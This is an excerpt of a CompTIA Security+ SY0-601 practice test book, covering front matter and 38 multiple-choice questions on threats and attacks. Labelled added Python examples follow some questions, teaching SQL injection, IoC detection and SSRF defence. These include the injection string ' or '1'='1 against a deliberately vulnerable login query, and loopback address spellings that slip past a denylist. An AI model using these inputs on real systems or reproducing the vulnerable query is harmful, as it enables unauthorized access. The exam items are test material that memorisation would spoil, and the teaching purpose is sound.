comptia security+ practice tests - dl1.newoutlook.it

Telegram Channel @nettrain


Table of Contents

Cover
Title Page
Copyright
Dedication
Acknowledgments
About the Author
About the Technical Editor
Introduction
    The Security+ Exam
    Using This Book to Practice
    Exam SY0-601 Exam Objectives
    SY0-601 Certification Exam Objective Map
Chapter 1: Threats, Attacks, and Vulnerabilities
Chapter 2: Architecture and Design
Chapter 3: Implementation
Chapter 4: Operations and Incident Response
Chapter 5: Governance, Risk, and Compliance
Appendix: Answers and Explanations
    Chapter 1: Threats, Attacks, and Vulnerabilities
    Chapter 2: Architecture and Design
    Chapter 3: Implementation
    Chapter 4: Operations and Incident Response
    Chapter 5: Governance, Risk, and Compliance
Index
End User License Agreement

CompTIA® Security+® Practice Tests

Exam SY0-601

Second Edition

David Seidl

Copyright © 2021 by John Wiley & Sons, Inc., Indianapolis, Indiana

Published simultaneously in Canada

ISBN: 978-1-119-73546-5

ISBN: 978-1-119-73545-8 (ebk.)

ISBN: 978-1-119-73544-1 (ebk.)

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at www.wiley.com/go/permissions.

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Web site is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Web site may provide or recommendations it may make. Further, readers should be aware that Internet Web sites listed in this work may have changed or disappeared between when this work was written and when it is read.

For general information on our other products and services or to obtain technical support, please contact our Customer Care Department within the U.S. at (877) 762-2974, outside the U.S. at (317) 572-3993 or fax (317) 572-4002.

Wiley publishes in a variety of print and electronic formats and by print-on-demand. Some material included with standard print versions of this book may not be included in e-books or in print-on-demand. If this book refers to media such as a CD or DVD that is not included in the version you purchased, you may download this material at booksupport.wiley.com. For more information about Wiley products, visit www.wiley.com.

Library of Congress Control Number: 2020950198

TRADEMARKS: Wiley, the Wiley logo, and the Sybex logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and Security+ are registered trademarks of CompTIA Properties, LLC. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.

This book is dedicated to Mike Chapple, who helped me get my start in the writing field. After most of a decade writing together, this is my first entirely solo project. Mike, thank you for helping me get my start almost a decade ago, for encouraging me along the way, and for continuing to challenge me to do more each time we take on another book.

—David

Acknowledgments

Books like this involve work from many people who put countless hours of time and effort into producing them from concept to final printed and electronic copies. The hard work and dedication of the team at Wiley always shows. I especially want to acknowledge and thank senior acquisitions editor Kenyon Brown, who continues to be a wonderful person to work with on book after book.

I also greatly appreciated the editing and production team for the book, including Tom Dinse, the project editor, who brought years of experience and great talent to the project; Chris Crayton, the technical editor, who provided insightful advice and gave wonderful feedback throughout the book; and Saravanan Dakshinamurthy, the production editor, who guided me through layouts, formatting, and final cleanup to produce a great book. I would also like to thank the many behind-the-scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.

My agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.

Finally, I want to thank my friends and family, who have supported me through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.

About the Author

David Seidl is vice president for information technology and CIO at Miami University, where he is responsible for IT for Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for Campus Technology Services at the University of Notre Dame, where he co-led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and services. Prior to his senior leadership roles at Notre Dame, he served as Notre Dame's director of information security and led Notre Dame's information security program. He taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business and has written books on security certification and cyberwarfare, including coauthoring CISSP (ISC)2 Official Practice Tests (Sybex, 2018) as well as the current and previous editions of the CompTIA CySA+ Study Guide: Exam CS0-002 (Wiley, 2020, Chapple/Seidl) and CompTIA CySA+ Practice Tests: Exam CS0-002 (Wiley, 2020, Chapple/Seidl).

David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, Pentest+, GPEN, and GCIH certifications.

About the Technical Editor

Chris Crayton, MSCE, CISSP, CySA+, A+, N+, S+, is a technical consultant, trainer, author, and industry-leading technical editor. He has worked as a computer technology and networking instructor, information security director, network administrator, network engineer, and PC specialist. Chris has served as technical editor and content contributor on numerous technical titles for several of the leading publishing companies. He has also been recognized with many professional and teaching awards.

Introduction

CompTIA Security+ Practice Tests: Exam SY0-601, Second Edition is the perfect companion volume to the CompTIA Security+ Study Guide: Exam SY0-601, Eighth Edition (Wiley, 2020, Chapple/Seidl). If you're looking to test your knowledge before you take the Security+ exam, this book will help you by providing a combination of 1,100 questions that cover the Security+ domains and easy-to-understand explanations of both right and wrong answers.

If you're just starting to prepare for the Security+ exam, we highly recommend that you use the CompTIA Security+ Study Guide, Eighth Edition to help you learn about each of the domains covered by the Security+ exam. Once you're ready to test your knowledge, use this book to help find places where you may need to study more or to practice for the exam itself.

Since this is a companion to the Security+ Study Guide, this book is designed to be similar to taking the Security+ exam. The book itself is broken up into seven chapters: five domain-centric chapters with questions about each domain, and two chapters that contain 100-question practice tests to simulate taking the Security+ exam itself.

If you can answer 90 percent or more of the questions for a domain correctly, you can feel safe moving on to the next chapter. If you're unable to answer that many correctly, reread the chapter and try the questions again. Your score should improve.

Don't just study the questions and answers! The questions on the actual exam will be different from the practice questions included in this book. The exam is designed to test your knowledge of a concept or objective, so use this book to learn the objectives behind the questions.

The Security+ Exam

The Security+ exam is designed to be a vendor-neutral certification for cybersecurity professionals and those seeking to enter the field. CompTIA recommends this certification for those currently working, or aspiring to work, in roles, including:

Systems administrator
Security administrator
Security specialist
Security engineer
Network administrator
Junior IT auditor/penetration tester
Security consultant

The exam covers five major domains:

1. Threats, Attacks, and Vulnerabilities
2. Architecture and Design
3. Implementation
4. Operations and Incident Response
5. Governance, Risk, and Compliance

These five areas include a range of topics, from firewall design to incident response and forensics, while focusing heavily on scenario-based learning. That's why CompTIA recommends that those attempting the exam have at least two years of hands-on work experience, although many individuals pass the exam before moving into their first cybersecurity role.

The Security+ exam is conducted in a format that CompTIA calls “performance-based assessment.” This means that the exam combines standard multiple-choice questions with other, interactive question formats. Your exam may include multiple types of questions, such as multiple-choice, fill-in-the-blank, multiple-response, drag-and-drop, and image-based problems.

CompTIA recommends that test takers have two years of information security–related experience before taking this exam. The exam costs $349 in the United States, with roughly equivalent prices in other locations around the globe. More details about the Security+ exam and how to take it can be found here: www.comptia.org/certifications/security

This book includes a discount code for the Security+ exam—make sure you use it!

You'll have 90 minutes to take the exam and will be asked to answer up to 90 questions during that time period. Your exam will be scored on a scale ranging from 100 to 900, with a passing score of 750.

You should also know that CompTIA is notorious for including vague questions on all of its exams. You might see a question for which two of the possible four answers are correct—but you can choose only one. Use your knowledge, logic, and intuition to choose the best answer and then move on. Sometimes, the questions are worded in ways that would make English majors cringe—a typo here, an incorrect verb there. Don't let this frustrate you; answer the question and move on to the next one.

CompTIA frequently does what is called item seeding, which is the practice of including unscored questions on exams. It does so to gather psychometric data, which is then used when developing new versions of the exam. Before you take the exam, you will be told that your exam may include these unscored questions. So, if you come across a question that does not appear to map to any of the exam objectives—or for that matter, does not appear to belong in the exam—it is likely a seeded question. You never know whether or not a question is seeded, however, so always make your best effort to answer every question.

Taking the Exam

Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher: www.comptiastore.com/Articles.asp?ID=265&category=vouchers

CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your ZIP code, whereas non-U.S. test takers may find it easier to enter their city and country. You can search for a test center near you at the Pearson VUE website, where you will need to navigate to “Find a test center.” www.pearsonvue.com/comptia

Now that you know where you'd like to take the exam, simply set up a Pearson VUE testing account and schedule an exam: home.pearsonvue.com/comptia/onvue

On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you, and that other requirements may exist for the test. Make sure you review those requirements before the day of your test so you're fully prepared for both the test itself as well as the testing process and facility rules.

After the Security+ Exam

Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam.

Maintaining Your Certification

CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can pass the most current version of the exam, earn a qualifying higher-level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.

CompTIA provides information on renewals via their website at: www.comptia.org/continuing-education

When you sign up to renew your certification, you will be asked to agree to the CE program's Code of Ethics, to pay a renewal fee, and to submit the materials required for your chosen renewal method.

A full list of the industry certifications you can use to acquire CEUs toward renewing the Security+ can be found at: www.comptia.org/continuing-education/choose/renew-with-a-single-activity/earn-a-higher-level-comptia-certification

Using This Book to Practice

This book is composed of seven chapters with over 1,000 practice test questions. Each of the first five chapters covers a domain, with a variety of questions that can help you test your knowledge of real-world, scenario, and best practices–based security knowledge. The final two chapters are complete practice exams that can serve as timed practice tests to help determine whether you're ready for the Security+ exam.

We recommend taking the first practice exam to help identify where you may need to spend more study time and then using the domain-specific chapters to test your domain knowledge where it is weak. Once you're ready, take the second practice exam to make sure you've covered all the material and are ready to attempt the Security+ exam.

As you work through questions in this book, you will encounter tools and technology that you may not be familiar with. If you find that you are facing a consistent gap or that a domain is particularly challenging, we recommend spending some time with books and materials that tackle that domain in depth. This approach can help you fill in gaps and help you be more prepared for the exam.

To access our interactive test bank and online learning environment, simply visit www.wiley.com/go/sybextestprep, register to receive your unique PIN, and instantly gain one year of FREE access after activation to the interactive test bank with 2 practice exams and hundreds of domain-by-domain questions. Over 1,000 questions total!

Exam SY0-601 Exam Objectives

CompTIA goes to great lengths to ensure that its certification programs accurately reflect the IT industry's best practices. They do this by establishing committees for each of its exam programs. Each committee consists of a small group of IT professionals, training providers, and publishers who are responsible for establishing the exam's baseline competency level and who determine the appropriate target-audience level.

Once these factors are determined, CompTIA shares this information with a group of hand-selected subject matter experts (SMEs). These folks are the true brainpower behind the certification program. The SMEs review the committee's findings, refine them, and shape them into the objectives that follow this section. CompTIA calls this process a job-task analysis (JTA).

Finally, CompTIA conducts a survey to ensure that the objectives and weightings truly reflect job requirements. Only then can the SMEs go to work writing the hundreds of questions needed for the exam. Even so, they have to go back to the drawing board for further refinements in many cases before the exam is ready to go live in its final state. Rest assured that the content you're about to learn will serve you long after you take the exam.

CompTIA also publishes relative weightings for each of the exam's objectives. The following table lists the five Security+ objective domains and the extent to which they are represented on the exam.

Domain                                       % of Exam
1.0 Threats, Attacks, and Vulnerabilities    24%
2.0 Architecture and Design                  21%
3.0 Implementation                           25%
4.0 Operations and Incident Response         16%
5.0 Governance, Risk, and Compliance         14%

SY0-601 Certification Exam Objective Map

Objective                                                                                          Chapter

1.0 Threats, Attacks and Vulnerabilities
1.1 Compare and contrast different types of social engineering techniques                          Chapter 1
1.2 Given a scenario, analyze potential indicators to determine the type of attack                 Chapter 1
1.3 Given a scenario, analyze potential indicators associated with application attacks             Chapter 1
1.4 Given a scenario, analyze potential indicators associated with network attacks                 Chapter 1
1.5 Explain different threat actors, vectors, and intelligence sources                             Chapter 1
1.6 Explain the security concerns associated with various types of vulnerabilities                 Chapter 1
1.7 Summarize the techniques used in security assessments                                          Chapter 1
1.8 Explain the techniques used in penetration testing                                             Chapter 1

2.0 Architecture and Design
2.1 Explain the importance of security concepts in an enterprise environment                       Chapter 2
2.2 Summarize virtualization and cloud computing concepts                                          Chapter 2
2.3 Summarize secure application development, deployment, and automation concepts                  Chapter 2
2.4 Summarize authentication and authorization design concepts                                     Chapter 2
2.5 Given a scenario, implement cybersecurity resilience                                           Chapter 2
2.6 Explain the security implications of embedded and specialized systems                          Chapter 2
2.7 Explain the importance of physical security controls                                           Chapter 2
2.8 Summarize the basics of cryptographic concepts                                                 Chapter 2

3.0 Implementation
3.1 Given a scenario, implement secure protocols                                                   Chapter 3
3.2 Given a scenario, implement host or application security solutions                             Chapter 3
3.3 Given a scenario, implement secure network designs                                             Chapter 3
3.4 Given a scenario, install and configure wireless security settings                             Chapter 3
3.5 Given a scenario, implement secure mobile solutions                                            Chapter 3
3.6 Given a scenario, apply cybersecurity solutions to the cloud                                   Chapter 3
3.7 Given a scenario, implement identity and account management controls                           Chapter 3
3.8 Given a scenario, implement authentication and authorization solutions                         Chapter 3
3.9 Given a scenario, implement public key infrastructure                                          Chapter 3

4.0 Operations and Incident Response
4.1 Given a scenario, use the appropriate tool to assess organizational security                   Chapter 4
4.2 Summarize the importance of policies, processes, and procedures for incident response          Chapter 4
4.3 Given an incident, utilize appropriate data sources to support an investigation                Chapter 4
4.4 Given an incident, apply mitigation techniques or controls to secure an environment            Chapter 4
4.5 Explain the key aspects of digital forensics                                                   Chapter 4

5.0 Governance, Risk, and Compliance
5.1 Compare and contrast various types of controls                                                 Chapter 5
5.2 Explain the importance of applicable regulations, standards, or frameworks that impact organizational security posture    Chapter 5
5.3 Explain the importance of policies to organizational security                                  Chapter 5
5.4 Summarize risk management processes and concepts                                               Chapter 5
5.5 Explain privacy and sensitive data concepts in relation to security                            Chapter 5

Exam objectives are subject to change at any time without prior notice and at CompTIA's discretion. Please visit CompTIA's website (www.comptia.org) for the most current listing of exam objectives.

Chapter 1
Threats, Attacks, and Vulnerabilities

THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:

1.1 Compare and contrast different types of social engineering techniques
1.2 Given a scenario, analyze potential indicators to determine the type of attack
1.3 Given a scenario, analyze potential indicators associated with application attacks
1.4 Given a scenario, analyze potential indicators associated with network attacks
1.5 Explain different threat actors, vectors, and intelligence sources
1.6 Explain the security concerns associated with various types of vulnerabilities
1.7 Summarize the techniques used in security assessments
1.8 Explain the techniques used in penetration testing

1. Ahmed is a sales manager with a major insurance company. He has received an email that is encouraging him to click on a link and fill out a survey. He is suspicious of the email, but it does mention a major insurance association, and that makes him think it might be legitimate. Which of the following best describes this attack?

A. Phishing
B. Social engineering
C. Spear phishing
D. Trojan horse

2. You are a security administrator for a medium-sized bank. You have discovered a piece of software on your bank's database server that is not supposed to be there. It appears that the software will begin deleting database files if a specific employee is terminated. What best describes this?

A. Worm
B. Logic bomb
C. Trojan horse
D. Rootkit

3. You are responsible for incident response at Acme Bank. The Acme Bank website has been attacked. The attacker used the login screen, but rather than enter login credentials, they entered some odd text: ' or '1'='1. What is the best description for this attack?

A. Cross-site scripting
B. Cross-site request forgery
C. SQL injection
D. ARP poisoning

4. Users are complaining that they cannot connect to the wireless network. You discover that the WAPs are being subjected to a wireless attack designed to block their Wi-Fi signals. Which of the following is the best label for this attack?

A. IV attack
B. Jamming
C. WPS attack
D. Botnet

5. Frank is deeply concerned about attacks to his company's e-commerce server. He is particularly worried about cross-site scripting and SQL injection. Which of the following would best defend against these two specific attacks?

A. Encrypted web traffic
B. Input validation
C. A firewall
D. An IDS

6. You are responsible for network security at Acme Company. Users have been reporting that personal data is being stolen when using the wireless network. They all insist they only connect to the corporate wireless access point (AP). However, logs for the AP show that these users have not connected to it. Which of the following could best explain this situation?

A. Session hijacking
B. Clickjacking
C. Rogue access point
D. Bluejacking

7. What type of attack depends on the attacker entering JavaScript into a text area that is intended for users to enter text that will be viewed by other users?

A. SQL injection
B. Clickjacking
C. Cross-site scripting
D. Bluejacking
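The login text in question 3, the input validation of question 5, and the shared text area of question 7 are easier to reason about against a real query. The following is an added example written for this edit, not code from the book: an in-memory SQLite table, a constructed user, a string-built login check beside a parameterized one, an allowlist username check, and output encoding for user-supplied text. The schema, user record and function names are assumptions.

```python
"""Added example, not code from the book: the login-form string from question 3,
the input validation from question 5, and the script-in-a-text-area problem from
question 7, run against an in-memory SQLite table. The table schema, the sample
user and the function names are constructed for this illustration."""
import html
import re
import sqlite3

PAYLOAD = "' or '1'='1"   # the text the attacker typed in question 3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user. Plaintext storage keeps the example
    short; question 8 covers why real systems hash passwords instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!pass')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: attacker text becomes SQL syntax. With PAYLOAD as the
    password the WHERE clause ends in ... AND password = '' or '1'='1', which is
    true for every row, so the check passes without a valid password."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver passes values separately from the statement,
    so PAYLOAD is compared literally against the stored password and fails."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def valid_username(value: str) -> bool:
    """Allowlist validation (question 5): accept only the characters a username
    legitimately needs instead of trying to strip known-bad strings. Quotes,
    spaces and angle brackets never get as far as the query or the page."""
    return USERNAME_RE.fullmatch(value) is not None


def render_comment(user_text: str) -> str:
    """Output encoding for the shared text area in question 7: the browser
    receives the attacker's <script> as inert text, not as markup to execute."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"
```

Input validation narrows what reaches the application, parameterization keeps data out of the SQL grammar, and output encoding keeps data out of the HTML grammar; the three are complementary, and the parameterized query is the one that survives a validation rule being loosened later.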

8. Rick wants to make offline brute-force attacks against his password file very difficult for attackers. Which of the following is not a common technique to make passwords harder to crack?

A. Use of a salt
B. Use of a pepper
C. Use of a purpose-built password hashing algorithm
D. Encrypting password plaintext using symmetric encryption

9. What term is used to describe spam over Internet messaging services?

A. SPIM
B. SMSPAM
C. IMSPAM
D. TwoFaceTiming

10. Susan is analyzing the source code for an application and discovers a pointer dereference where the pointer can be NULL. This causes the program to attempt to read from the NULL pointer and results in a segmentation fault. What impact could this have for the application?

A. A data breach
B. A denial-of-service condition
C. Permissions creep
D. Privilege escalation

11. Teresa is the security manager for a mid-sized insurance company. She receives a call from law enforcement, telling her that some computers on her network participated in a massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her company would be involved in a cybercrime. What would best explain this scenario?

A. It is a result of social engineering.
B. The machines all have backdoors.
C. The machines are bots.
D. The machines are infected with crypto-viruses.

12. Unusual outbound network traffic, geographical irregularities, and increases in database read volumes are all examples of what key element of threat intelligence?

A. Predictive analysis
B. OSINT
C. Indicators of compromise
D. Threat maps
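The three indicators named in question 12 can each be checked mechanically over activity records. The following is an added example written for this edit, not code from the book or any product: a handful of constructed records for two users, an impossible-travel check for the geographic irregularity, and a per-user median baseline for the outbound-traffic and database-read spikes. The record layout, the 2-hour travel window and the 10x multiplier are assumptions.

```python
"""Added example, not code from the book: the three indicators of compromise named
in question 12 turned into checks over a small, constructed set of activity
records. The record layout, the users, the 2-hour travel window and the 10x
baseline multiplier are assumptions for this illustration."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: (timestamp, user, country of source IP, bytes sent
# outbound, database rows read). "bob" is the compromised account.
LOG = [
    ("2023-03-01T09:00:00", "bob",   "US", 2_000_000,     500),
    ("2023-03-01T10:00:00", "bob",   "US", 2_500_000,     450),
    ("2023-03-01T10:20:00", "bob",   "BR", 1_000_000,     400),   # 20 minutes later, another continent
    ("2023-03-01T23:30:00", "bob",   "US", 250_000_000, 90_000),  # bulk read, then large egress
    ("2023-03-01T09:05:00", "carol", "US", 1_800_000,     300),
    ("2023-03-01T11:05:00", "carol", "US", 2_100_000,     320),
]
FIELD_INDEX = {"egress": 3, "reads": 4}


def parse(rec):
    ts, user, country, egress, reads = rec
    return datetime.fromisoformat(ts), user, country, egress, reads


def geographic_irregularities(log, window=timedelta(hours=2)):
    """Impossible travel: the same user seen from two countries within `window`.
    Returns (user, previous country, new country, timestamp) per hit."""
    last_seen, hits = {}, []
    for ts, user, country, _, _ in sorted(parse(r) for r in log):
        prev = last_seen.get(user)
        if prev and prev[1] != country and ts - prev[0] <= window:
            hits.append((user, prev[1], country, ts))
        last_seen[user] = (ts, country)
    return hits


def volume_anomalies(log, field, factor=10):
    """Records where `field` exceeds `factor` times that user's own median for the
    period. The median is a crude baseline, but one large outlier cannot drag it
    up the way it would a mean. Returns (user, timestamp, value) per hit."""
    idx = FIELD_INDEX[field]
    per_user = defaultdict(list)
    for rec in (parse(r) for r in log):
        per_user[rec[1]].append(rec)
    hits = []
    for user, recs in per_user.items():
        baseline = statistics.median(r[idx] for r in recs)
        hits.extend((user, r[0], r[idx]) for r in recs if r[idx] > factor * baseline)
    return hits


def indicators(log):
    """The three IoCs from the question, each as a list of hits."""
    return {
        "geographical_irregularities": geographic_irregularities(log),
        "unusual_outbound_traffic": volume_anomalies(log, "egress"),
        "database_read_volume_increase": volume_anomalies(log, "reads"),
    }
```

Each check on its own produces noise (a VPN exit in another country, a legitimate month-end export); the value of these indicators in practice comes from several of them lining up on the same account in a short window, as they do for the constructed "bob" records.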

13. Chris needs visibility into connection attempts through a firewall because he believes that a TCP handshake is not properly occurring. What security information and event management (SIEM) capability is best suited to troubleshooting this issue?

A. Reviewing reports
B. Packet capture
C. Sentiment analysis
D. Log collection and analysis

14. Chris wants to detect a potential insider threat using his security information and event management (SIEM) system. What capability best matches his needs?

A. Sentiment analysis
B. Log aggregation
C. Security monitoring
D. User behavior analysis

15. Chris has hundreds of systems spread across multiple locations and wants to better handle the amount of data that they create. What two technologies can help with this?

A. Log aggregation and log collectors
B. Packet capture and log aggregation
C. Security monitoring and log collectors
D. Sentiment analysis and user behavior analysis

16. What type of security team establishes the rules of engagement for a cybersecurity exercise?

A. Blue team
B. White team
C. Purple team
D. Red team

17. Cynthia is concerned about attacks against an application programming interface (API) that her company provides for its customers. What should she recommend to ensure that the API is only used by customers who have paid for the service?

A. Require authentication.
B. Install and configure a firewall.
C. Filter by IP address.
D. Install and use an IPS.

18. What type of attack is based on sending more data to a target variable than the data can actually hold?

A. Bluesnarfing
B. Buffer overflow
C. Bluejacking
D. Cross-site scripting

19. An email arrives telling Gurvinder that there is a limited time to act to get a software package for free and that the first 50 downloads will not have to be paid for. What social engineering principle is being used against him?

A. Scarcity
B. Intimidation
C. Authority
D. Consensus

20. You have been asked to test your company network for security issues. The specific test you are conducting involves primarily using automated and semiautomated tools to look for known vulnerabilities with the various systems on your network. Which of the following best describes this type of test?

A. Vulnerability scan
B. Penetration test
C. Security audit
D. Security test

21. Susan wants to reduce the likelihood of successful credential harvesting attacks via her organization's commercial websites. Which of the following is not a common prevention method aimed at stopping credential harvesting?

A. Use of multifactor authentication
B. User awareness training
C. Use of complex usernames
D. Limiting or preventing use of third-party web scripts and plugins

22. Greg wants to gain admission to a network which is protected by a network access control (NAC) system that recognizes the hardware address of systems. How can he bypass this protection?

A. Spoof a legitimate IP address.
B. Conduct a denial-of-service attack against the NAC system.
C. Use MAC cloning to clone a legitimate MAC address.
D. None of the above

23. Coleen is the web security administrator for an online auction website. A small number of users are complaining that when they visit the website it does not appear to be the correct site. Coleen checks and she can visit the site without any problem, even from computers outside the network. She also checks the web server log and there is no record of those users ever connecting. Which of the following might best explain this?

A. Typosquatting
B. SQL injection
C. Cross-site scripting
D. Cross-site request forgery

24. The organization that Mike works in finds that one of their domains is directing traffic to a competitor's website. When Mike checks, the domain information has been changed, including the contact and other administrative details for the domain. If the domain had not expired, what has most likely occurred?

A. DNS hijacking
B. An on-path attack
C. Domain hijacking
D. A zero-day attack

25. Mahmoud is responsible for managing security at a large university. He has just performed a threat analysis for the network, and based on past incidents and studies of similar networks, he has determined that the most prevalent threat to his network is low-skilled attackers who wish to breach the system, simply to prove they can or for some low-level crime, such as changing a grade. Which term best describes this type of attacker?

A. Hacktivist
B. Amateur
C. Insider
D. Script kiddie

26. How is phishing different from general spam?

A. It is sent only to specific targeted individuals.
B. It is intended to acquire credentials or other data.
C. It is sent via SMS.
D. It includes malware in the message.

27. Which of the following best describes a collection of computers that have been compromised and are being controlled from one central point?

A. Zombienet
B. Botnet
C. Nullnet
D. Attacknet

28. Selah includes a question in her procurement request-for-proposal process that asks how long the vendor has been in business and how many existing clients the vendor has. What common issue is this practice intended to help prevent?

A. Supply chain security issues
B. Lack of vendor support
C. Outsourced code development issues
D. System integration problems

29. John is conducting a penetration test of a client's network. He is currently gathering information from sources such as archive.org, netcraft.com, social media, and information websites. What best describes this stage?

A. Active reconnaissance
B. Passive reconnaissance
C. Initial exploitation
D. Pivot

30. Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing them?

A. Removing all SQL code from submitted HTTP queries
B. Blocking hostnames like 127.0.0.1 and localhost
C. Blocking sensitive URLs like /admin
D. Applying whitelist-based input filters
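The defences question 30 lists combine into a single check on the URL a server is asked to fetch. The following is an added example written for this edit, not code from the book: an allowlist of hosts, a class-based test on the address the host resolves to, and a normalized sensitive-path check, with a bare string denylist shown alongside for contrast. The allowed hosts, blocked prefixes and the fake resolver standing in for DNS are assumptions; a real service must also re-check the address it actually connects to, since DNS answers can change between the check and the fetch.

```python
"""Added example, not code from the book: an allowlist-based check for a
user-supplied URL that the server is about to fetch, combining the useful
defences from question 30 (allowlist filters, blocking internal addresses,
blocking sensitive paths). The allowed hosts, blocked path prefixes and the
fake resolver are constructed for the illustration; a real service consults DNS
and must re-check the address it actually connects to, since the answer can
change between the check and the fetch."""
import ipaddress
import posixpath
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}   # assumed allowlist
BLOCKED_PATH_PREFIXES = ("/admin", "/internal")          # assumed sensitive paths

# Constructed name -> address map standing in for DNS. cdn.example.com is on the
# allowlist but currently resolves to a private address (a DNS change or
# rebinding), which is why resolution is checked even for allowlisted names.
FAKE_DNS = {
    "api.example.com": "93.184.216.34",
    "cdn.example.com": "10.0.0.5",
}


def is_internal(addr: str) -> bool:
    """Loopback, RFC 1918, link-local (169.254.169.254 included), CGNAT, reserved
    and unspecified ranges are all non-global in the ipaddress module."""
    return not ipaddress.ip_address(addr).is_global


def check_fetch_url(url: str, resolve=FAKE_DNS.get):
    """Return (allowed, reason). Each rule is an allowlist or an address-class
    test, never a search for the literal string '127.0.0.1'."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"           # http://api.example.com@evil/
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    addr = resolve(host)
    if addr is None or is_internal(addr):
        return False, "host resolves to internal address"
    path = posixpath.normpath(parts.path or "/").lower()   # collapses /v1/../admin
    if path.startswith(BLOCKED_PATH_PREFIXES):
        return False, "sensitive path"
    return True, "ok"


# For contrast, the string denylist of option B on its own: the loopback address
# has several spellings that HTTP libraries accept, and the denylist matches
# none of them.
LOOPBACK_SPELLINGS = ["http://127.1/", "http://2130706433/", "http://0x7f000001/", "http://[::1]/"]


def naive_denylist_allows(url: str) -> bool:
    return "127.0.0.1" not in url and "localhost" not in url.lower()
```

Option B is not wrong, only insufficient on its own: the allowlist is what removes the alternative spellings, and the resolution check is what catches an allowlisted name that has been pointed at an internal address.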

31. What type of attack is based on entering fake entries into a target network's domain name server?

A. DNS poisoning
B. ARP poisoning
C. XSS poisoning
D. CSRF poisoning

32. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the test, he has only been given the company name, the domain name for their website, and the IP address of their gateway router. What best describes this type of test?

A. A known environment test
B. External test
C. An unknown environment test
D. Threat test

33. You work for a security company that performs penetration testing for clients. You are conducting a test of an e-commerce company. You discover that after compromising the web server, you can use the web server to launch a second attack into the company's internal network. What best describes this?

A. Internal attack
B. Known environment testing
C. Unknown environment testing
D. A pivot

34. While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner to help compromise the system, and it appears that applications have been attaching to this file, rather than the real system DLL. What best describes this?

A. Shimming
B. Trojan horse
C. Backdoor
D. Refactoring

35. Which of the following capabilities is not a key part of a SOAR (security orchestration, automation, and response) tool?

A. Threat and vulnerability management
B. Security incident response
C. Automated malware analysis
D. Security operations automation

36. John discovers that email from his company's email servers is being blocked because of spam that was sent from a compromised account. What type of lookup can he use to determine what vendors like McAfee and Barracuda have classified his domain as?

A. An nslookup
B. A tcpdump
C. A domain reputation lookup
D. An SMTP whois

37. Frank is a network administrator for a small college. He discovers that several machines on his network are infected with malware. That malware is sending a flood of packets to a target external to the network. What best describes this attack?

A. SYN flood
B. DDoS
C. Botnet
D. Backdoor

38. Why is SSL stripping a particular danger with open Wi-Fi networks?

A. WPA2 is not secure enough to prevent this.
B. Open hotspots do not assert their identity in a secure way.
C. Open hotspots can be accessed by any user.
D. 802.11ac is insecure and traffic can be redirected.

